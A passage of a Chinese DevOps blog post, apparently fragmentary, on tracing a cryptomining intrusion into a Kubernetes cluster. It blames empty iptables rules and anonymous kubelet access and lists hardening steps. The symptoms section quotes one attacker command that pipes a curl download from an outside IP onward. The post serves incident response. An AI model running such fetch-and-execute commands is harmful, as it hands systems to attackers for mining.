线上 K8s 集群被入侵挖矿排查思路
入侵现象
2 | curl -s http://45.9.148.35/scan_threads.dat |
具体原因排查
iptables为空
iptables. 果不其然, 机器上的iptables规则是空的, 意味着这台机器在裸奔.kubelet裸奔
kubelet设置不当
改进方案
机器防火墙设置, 机器防火墙是整个系统最外层, 即使机器的防火墙同步失败, 也不能默认开放所有端口, 而是应该全部关闭, 等待管理员连接到tty终端上检查. 使用机器时, 假如机器不是暴露给外部使用的, 公网IP可有可无的时候, 尽量不要有公网IP, 我们的机器才上线1天就被扫描到了漏洞, 可想而知, 公网上是多么的危险 使用kubelet以及其他系统服务时, 端口监听方面是不是该有所考量? 能不能不监听 0.0.0.0, 而是只监听本机的内网IP.使用kubelet以及其他程序, 设计或是搭建系统时, 对于匿名访问时的权限控制, 我们需要考虑到假如端口匿名会出现什么问题, 是否应该允许匿名访问, 如果不允许匿名访问, 那么怎么做一套鉴权系统? 系统管理员操作时, 是否有一个比较规范化的流程, 是不是该只使用脚本操作线上环境? 手动操作线上环境带来的问题并不好排查和定位.
总结
- END -
推荐阅读
线上 K8s Ingress 访问故障排查思路
Prometheus PromQL语句编写案例
基于 Prometheus、InfluxDB 与 Grafana 打造监控平台
2021最佳 DevOps 监控工具
Kubernetes上生产环境后,99%都会遇到这2个故障
Kubernetes 集群要崩溃了,关键时刻体现运维力
终于明白了 DevOps 与 SRE 的区别!
Prometheus 高可用方案
Kubernetes 部署微服务利器 Helm
Kubernetes 在企业中的应用场景
使用 Jenkins 构建 CI/CD 之多分支流水线
漫画解释如何用 Kubernetes 实现 CI/CD
学习Docker,看这一篇就够了!(收藏版)
正确姿势配置 Pod 的 CPU和内存
60道常见的 Kubernetes 面试题总结
订阅,一起成长
K8s生态圈
点在看,K8s一年不出问题 👇